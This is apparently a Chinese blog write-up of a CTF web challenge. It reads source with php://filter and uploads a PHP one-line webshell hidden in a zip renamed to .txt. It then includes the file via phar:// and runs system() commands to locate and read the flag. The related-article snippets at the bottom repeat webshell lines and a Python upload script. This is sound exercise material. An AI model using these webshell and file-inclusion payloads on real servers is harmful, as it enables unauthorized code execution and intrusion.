CTF--这好像不是文件上传

最新推荐文章于 2025-04-26 11:18:50 发布

原创最新推荐文章于 2025-04-26 11:18:50 发布

· 757 阅读

0 ·

版权

CTF 专栏收录该内容

2 篇文章

订阅专栏

打开题目F12看到一个被注释的跳转。

访问可以知道是一个文件包含

经过测试，该文件禁止了input、data关键字。并禁止了phar://协议。

使用php://filter读取题目源码得到

http://47.94.221.39:8003/index.php?filename=php://filter/read=convert.base64-encode/resource=index.php

读取upload.php文件源码如下：

可以看出upload文件将上传的文件后缀改为txt，文件为重命名了。所以想到利用phar://协议，将一个1.php写入一句话木马，

<?php eval($_POST['a']);?>

压缩为1.zip，后缀名改为1.txt。上传成功，这里我进行访问的使用采用相对路径显示报错，因此我才用的绝对路径包含，构造payload，访问如图

http://47.94.221.39:8003/upload.php?file=phar:%2f%2f%2fvar%2fwww%2fhtml%2fupload%2f868b29565d344eccbdd032a0c5a82d9d.txt%2f1

a=phpinfo();

ls查看一下发现并没有在当前目录。执行以下命令进行搜索

a=system('find / -name "flag"');

直接显示

http://47.94.221.39:8003/upload.php?file=phar:///var/www/html/upload/3bef1a5876d201c96ff453db1fdf7be3.txt/1

POST：a=system('cat /flag');

unctf{asdasda_LFI_web_234234}

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

浅笑⁹⁹⁶

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

ctf 文件上传总结

njqfb的博客

06-04

3450

前端绕过正常上传文件,捉取数据包修改后端绕过服务器端检测的绕过 windows特性 windows对文件名自动去掉点空格 ::$DATA(这个是ntfs的特性) 利用这个特性绕过黑名单限制函数特性 move_uploaded_file函数会自动去除文件名末尾的点和 /. fopen函数特性 <?php $filename='1.php/.'; $content="<?php eval($_POST[1]);?>"; $f = fopen($filename, 'w');

JIS-CTF-VulnUpload-CTF01靶机渗透测试

weixin_52971422的博客

04-11

3738

靶机名：JIS-CTF-VulnUpload-CTF01 攻击机：kali 任务寻找5个flag 靶机信息扫描 Nmap -sV -A -p- ip 信息收集发现有Robots协议上网页成功拿到第一个flag 上到/admin_area发现了第二个flag和网页用户上到/login.php登录登录上去后发现有个文件上传 直接上传一个shell.php上去看看好像成功上传上去了，在前面robots.txt里有uploaded_files的

参与评论您还未登录，请先登录后发表或查看评论

BUUCTF：[安洵杯 2019]不是文件上传

末初 · mochu7

03-28

2418

这题和攻防世界XCTF：upload有点像，看似上传却都不是上传是上传图片的文件名注入参考：安洵杯2019 官方Writeup 获取源码在网站首页存在一些信息在gihtub找得到源码 BUU也给出了这题的源码漏洞分析在图片上传处，check函数并未对文件名(title)进行检测, 直接传递到最后的SQL语句当中。导致了SQL注入，并且属于Insert注入。审计代码后可知，图片...

CTF 中的 upload(文件上传)

最新发布

yqya_的博客

04-26

788

ctf 中对于 upload(文件上传) 的考察

网络安全最全CTFshow web入门——文件上传_ctfshow文件上传(1)

2401_84301853的博客

05-04

2621

日志包含过滤关键字是log所以用拼接绕过上传完.user.ini和图片后访问网站然后修改ua头信息。

CTF做题笔记--upload

Hasur的博客

03-02

1245

我们直接来看这道题目，在这里我们可以发现上传任何的文件都可以说是上传成功，这一点和其他的文件上传漏洞不太一样，其他的大部分都是通过限制上传危险文件，但这个并不是。而且在上传完文件之后，也没有给出文件的上传路径，但是会回显出文件名。如上图所示，这里回显出来了我们的文件名这里比较关键的是需要我们想到这里可以利用sql注入来获取flag当然，这里是图片文件名存在注入，并且过滤了select from ，我们通过用双写就能绕过在做这道题之前，我们需要去了解一个函数：CONV()

【CTF】文件上传（知识点+例题）(1)

qq_53099119的博客

03-23

7550

有的站点会出现仅进行了前端校验的情况（一切在前端做的安全防护，都是耍流氓），由于前端页面的源码是我们可以随意更改的，因此可以通过找到进行过滤的指令，更改成我们想要的功能即可。假设接下来就可以上传一个名为1.png的木马文件，植入后门，将其上传后，该文件虽文件后缀名为png，但会被当作php类型的文件进行解析，其中的一句话木马也能够被正常执行。因此，通过使用.user.ini，我们可以任意指定包含一个文件，这个文件可以是我们自己上传的木马文件，从而通过该木马文件提供后门来获取当前服务器的webshell。

CTFHub-Web--信息泄露

m0_69003772的博客

04-23

1675

CTF简介以及信息泄露下题目解题过程文章目录前言一、基础知识 1.CTF简介 2.竞赛模式 2.1.理论知识 2.2.Jeopardy-解题 2.3.AwD-攻防模式 2.4.AWP-攻防增强 2.5.RHG-自动化[ AI自动化] 2.6RW-真实世界 2.7.KoH-抢占山头 2.8.Mix[混合] 3.比赛形式 3.1.线上 3.2.线下 4.题目类型 4.1.Web 4.2.Pwn 4.3.Reverse 4.4.C.

CTF-Web-SQL注入

beihai2013

01-26

3469

题目目录参考https://ca01h.top/Web_security/ctf_writeup/8.buuctf%E5%88%B7%E9%A2%98%E2%80%94%E2%80%94XSS/ 随便注题目来源：强网杯2019 题目链接：https://buuoj.cn/challenges#[%E5%BC%BA%E7%BD%91%E6%9D%AF%202019]%E9%9A%8F%E4%BE%BF%E6%B3%A8 考察：堆叠注入，sql的show语句，sql的预编译，sql修改表参考：https:/

BugkuCTF-WEB-第43题到第52题

Alita_lxz的博客

11-04

1342

BugkuCTF-WEB-第43题到第52题

【CTF-SHOW】Web入门 Web14 【editor泄露-详】【var/www/html目录-详】

2302_79596028的博客

10-19

1146

本文介绍了CTFSHOW中WEb入门web14的详细解法，同时详细拓展了editor泄露和var/www/html目录的知识点

小白的CTF之路之文件上传（三）

glass_york的博客

01-14

439

文件上传

ctf技能树----文件上传

qq_44418229的博客

05-10

1236

ctf技能树----文件上传

[HXPCTF 2021]includer‘s revenge

rev1ve的博客

11-12

662

这种情况下我们还是可以在对应的 /proc/PID/fd 下找到我们删除的文件，虽然显示是被删除了，但是我们依然可以读取到文件内容，所以我们可以直接用php 进行文件包含。但是最后一个问题就是，既然我们要去包含 Nginx 进程下的文件，我们就需要知道对应的 pid 以及 fd 下具体的文件名，怎么才能获取到这些信息呢？这时我们就需要用到文件读取进行获取 proc 目录下的其他文件了，这里我们只需要本地搭个 Nginx 进程并启动，对比其进程的 proc 目录文件与其他进程文件区别就可以了。

小白的CTF之路之文件上传（二）

glass_york的博客

01-13

389

文件上传

CTF文件上传 与条件竞争上传

2301_81556781的博客

08-01

960

htaccess文件(或者”分布式配置文件”)提供了针对目录改变配置的方法，即在一个特定的文档目录中放置一个包含一个或多个指令的文件，以作用于此目录及其所有子目录。作为用户，所能使用的命令受到限制。管理员可以通过Apache的AllowOverride指令来设置。概述来说，htaccess文件是Apache服务器中的一个配置文件，它负责相关目录下的网页配置。

文件上传漏洞详解（CTF篇）

热门推荐

nobugnomoney的博客

09-16

1万+

需要了解的前置知识： 1.什么是文件上传： 文件上传就是通过流的方式将文件写到服务器上 文件上传必须以POST提交表单表单中需要 <input type="file" name="upload"> 2.一句话木马 <?php eval($_POST['a']) ?> 其中eval就是执行命令的函数，**$_POST[‘a’]**就是接收的数据。eval函数把接收的数据当作PHP代码来执行。这样我们就能够让插入了一句话木马的网站执行我们传递过去的任意PHP语句。这便是一句话木马

WEB漏洞攻防 - 文件上传漏洞 - CTF比赛类应用场景 - [RoarCTF 2024]Simple Upload

qq_58071132的博客

04-07

413

🍅 硬核资料：关注即可领取PPT模板、简历模板、行业经典书籍PDF。🍅 技术互助：技术群大佬指点迷津，你的问题可能不是问题，求资源在群里喊一声。🍅 面试题库：由技术群里的小伙伴们共同投稿，热乎的大厂面试真题，持续更新中。🍅 知识体系：含编程语言、算法、大数据生态圈组件（Mysql、Hive、Spark、Flink）、数据仓库、Python、前端等等。一个人可以走的很快，但一群人才能走的更远。

【CTF-Web】文件上传漏洞学习笔记（ctfshow题目）

m0_74825746的博客

12-11

1264

再上传一个png 改后缀为php 好！寄可以看到msg没有正常显示位置上传失败所以我们使用配置文件去解析一下，配置文件有两个下面分别介绍一下Reference1.user.ini在nginx或者Apache服务中都可以使用利用条件：open_basedir没有被限制利用原理：使用该配置文件可以让所有php文件自动包含某个文件: 在加载打开的php文件的第一行代码之后加载配置指定的php文件: 在加载打开的php文件的第一行代码之前加载配置指定的php文件上传一句话木马图片上传配置文件。

CTF 文件上传脚本

01-06

### CTF 文件上传漏洞利用脚本在CTF竞赛中，文件上传题目通常涉及绕过服务器端的安全检查以实现任意代码执行。下面是一个简单的Python脚本示例，用于测试文件上传功能是否存在安全漏洞： ```python import requests url = "http://example.com/upload" files = {'file': ('avatar.php', '<?php system($_GET["cmd"]); ?>', 'image/jpeg')} data = {"submit": "Upload"} response = requests.post(url, files=files, data=data) print(response.text) ``` 此段代码尝试向目标URL发送POST请求，并附带一个伪装成图片但实际上包含PHP命令执行语句的文件[^1]。为了验证文件是否被正确处理以及能否被执行，可以访问上传后的路径并向`cmd`参数传递Linux指令，比如查看当前工作目录： ``` http://example.com/uploads/avatar.php?cmd=pwd ``` 需要注意的是，在实际环境中应当遵循合法合规的原则，仅对授权范围内的系统进行渗透测试活动；上述内容仅供学习交流之用。